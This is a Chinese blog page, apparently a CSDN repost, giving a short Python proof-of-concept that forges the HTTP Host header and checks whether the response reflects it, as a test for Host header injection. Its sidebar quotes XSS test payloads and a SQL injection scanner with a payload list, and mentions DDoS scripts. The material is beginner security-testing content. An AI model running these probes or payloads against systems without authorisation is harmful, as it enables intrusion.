python3基础学习(http host头攻击漏洞POC)

最新推荐文章于 2023-09-10 22:00:15 发布
最新推荐文章于 2023-09-10 22:00:15 发布
阅读量489 收藏 1
点赞数
文章标签: python
原文链接:https://yq.aliyun.com/articles/505469
版权

  简单版http host头攻击漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下:

from urllib import request
import sys
import re
url=sys.argv[1]
header={'Host' : 'www.eth10.com'}

req=request.Request(url,headers=header)
u = request.urlopen(req)
resp = u.read()

if re.match('.*www.eth10.com',str(resp)):
    print('漏洞存在')
else:
    print('不存在该漏洞')

  使用语法:python3 host.py URL,URL格式为:http://xx.xx.xx


本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/2052582


weixin_33682719
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS跨站脚本攻击(内含poc)----自用笔记
weixin_59114667的博客
02-22 281
仅仅是自已用,无别的想法(doge)
python3基础学习http host***漏洞POC
weixin_33737134的博客
12-20 355
  简单版http host***漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下: from urllib import request import sys import re url=sys.argv[1] header={'Host' : 'www.eth10.com'} req=request.Request(url,headers=header) u ...
开发 Python 项目,要注意这 3个安全漏洞
Mankel
11-25 379
最近在一个 Python Web 项目中处理了 3 个安全漏洞。 在修复完毕之后,来给大家简单地总结分享一下,以提高大家在程序编写和项目开发中的安全意识。 1.YAML文件解析漏洞 在项目中,我们使用了 Python 的 yaml 模块来解析用户上传文件中的.yaml文件,在之前的代码中我们使用了如下的代码对.yaml文件进行读取和解析: import yaml yaml.load(yaml_file) 实际上,这样做会带来很大的安全风险。正常情况下,yaml会按照特定的解析规则对 yaml文件的内容进行
xss poc
cnbird's blog
03-15 765
Ajax Worm - Proof of Concept http://myappsecurity.blogspot.com/2006/12/ajax-worm-proof-of-concept.html Ajax Sniffer - Prrof of concept http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-pr
python写注入漏洞poc
weixin_30552811的博客
04-30 405
webug靶场一道简单的注入题 加点后报错 could not to the database You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line...
安全开发Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
some_pocsuite:用于漏洞排查的pocsuite3验证POC代码
05-23
some_pocsuite用于企业内部进行漏洞排查与验证的的pocsuite3验证POC代码(pocsuite3是知道创宇安全团队的开源漏洞测试框架)。由于原Pocsuite已停止更新,因此将原来的POC代码全部重新改写并迁移到pocsuite3,原POC...
Python网页OA系统POC漏洞检测系统,框架FLask + python + OAPOC payload
07-19
Python网页OA系统POC漏洞检测系统 框架FLask + python + OAPOC payload 角色介绍 管理员 admin 123456 模块介绍 登录模块 首页模块 OA安全检测子模块(支持多个url或者单个url检测,调用payload并在界面回馈检测...
心脏漏洞POC代码(Python2)
06-07
标题“心脏漏洞POC代码(Python2)”表明这是一个Proof-of-Concept(概念验证)代码,用于演示如何利用心脏漏洞。该代码基于Python2编写,可以帮助安全研究人员或渗透测试人员理解和检测心脏漏洞。 描述中提到的...
常见Exp漏洞POC集合
01-21
"常见Exp漏洞POC集合"是一个珍贵的资源,包含了多种不同的Exploit POC,为安全研究人员提供了深入研究和学习的宝贵材料。这个资源由bugscan平台收集,旨在帮助爱好者和专业人士了解并防御各类网络安全威胁。 首先,...
python DVWAXSSPOC练习
最新发布
weixin_56537388的博客
09-10 292
【代码】python DVWAXSSPOC练习。
XSS漏洞poc与exp
bamanju0574的博客
09-01 892
poc <script>alert('xss')</script> 最简单常用的poc <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('...
检测到目标url存在http host攻击漏洞_原创干货 | 认识CORS漏洞
weixin_39777540的博客
12-15 603
点击上方蓝色字关注我们~前 言CORS漏洞其中已经存在很久了,但是国内了解的人不是很多,文章更是少只有少,漏洞平台也没有此分类。在DefConChina中,陈建军分享的议题中解释的更清楚,有意向的可以找PPT或者视频owasp内的详细介绍http://blog.securelayer7.net/owasp-top-10-security-misconfiguration-5-cors-v...
python搭建HTTP代理 和 使用HTTP代理
SAGGITARXM
02-03 5084
【代码】python搭建HTTP代理 和 使用HTTP代理。
java api操作es实战笔记
zl_action的博客
07-01 1135
说明: 1 该文档仅供参考,时间有限,日后如有深入理解, 会更新 2 操作es ,了解过的有以下几种, 2.1 TransportClient客户端 :官方已经明确表示在ES 7.0版本中将弃用TransportClient客户端,且在8.0版本中完全移除它,不推荐使用,没使用过 2.2spring-boot-starter-data-elasticsearch:与spring...
springboot 2.0集成elasticsearch 7.6.2(集群)
热门推荐
专注于Java架构学习 https://gitee.com/laokouyun https://github.com/KouShenhai
03-13 1万+
小伙伴们,你们好呀,我是老寇,跟我一起学习es 7.6.2 注:请点击我,获取源码 目录 一、引入依赖配置pom.xml 二、配置application-dev.yml(生产就克隆application-dev改成生产配置) 三、配置ES注解 四、配置es及swagger 五、ES工具类 (索引相关配置不懂的,请查看elasticsearch 7.6.2 - 索引管理) 七、测试es 一、引入依赖配置pom.xml <dependency>
python DDos网络攻击一般网站-1
樱花落瓣
12-13 4916
DDOS原理讲解 史上最全DDoS攻击与防御教程 DDoS攻击的防护与本质解析 DDOS 攻击的防范教程 思想很简单,就是对构建多个socket链接后,并且每个socket对这个网站无限的发送信息,做一个死循环,疯狂攻击。以起到占用他们网站资源链接的效果。 ‘’’’’’’ ...
python3网站攻击_Python实现DDos攻击实例详解
weixin_39532421的博客
11-20 1064
SYN 泛洪攻击SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求,使被攻击主机资源耗尽(通常是 CPU 满负荷或内存不足)的攻击方式我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务器端发送SYN报文,随后服务端返回以SYN+ACK报文,最后客户端向服务端发送ACK报文完成三次握手而SYN泛洪攻击则是客户端向服务器发送SYN报文之后就不再响应服务...
python编写一个查找SQL注入漏洞POC脚本
04-03
这个任务需要用到python的requests库和re库。以下是一个简单的POC脚本: ```python import requests import re url = 'http://example.com/search.php?q=' payloads = ["'", "\"", "\\", ";", "-- ", "#", "/*", "*/", "||", "&&", "(", ")"] for payload in payloads: r = requests.get(url + payload) if re.search("error", r.text, re.IGNORECASE): print("SQL injection vulnerability found with payload:", payload) ``` 这个脚本会发送一个GET请求,将每个payload添加到查询字符串中,然后搜索响应的页面是否包含“error”字符串。如果包含,则说明存在SQL注入漏洞,并输出触发注入漏洞的payload。 需要注意的是,这个脚本只是一个简单的示例,不一定适用于所有情况。在实际使用中,需要更多的测试和精细的调整来确保准确性和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值